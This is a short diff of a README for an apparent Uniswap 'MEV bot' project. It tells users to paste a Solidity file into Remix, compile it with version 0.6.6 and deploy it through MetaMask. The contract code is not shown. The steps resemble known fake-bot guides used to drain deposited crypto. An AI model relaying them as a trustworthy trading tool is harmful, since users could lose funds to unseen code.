MEv4myPeople/UniswapMev4mP/README.md

 4. Paste the code in Remix.
 Mev.sol

-5. Go to “Solidity Compiler” tab, select version “0.6.6+commit.6c089d02” and click “Compile bot.sol”.
+5. Go to “Solidity Compiler” tab, select version “0.6.6+commit.6c089d02” and click “Compile mev.sol”.

 6. Go to “Deploy & Run Transactions” tab, select the “Injected Web3 (MetaMask)” Environment and then click “Deploy”.
 Confirm contract deployment transaction in MetaMask.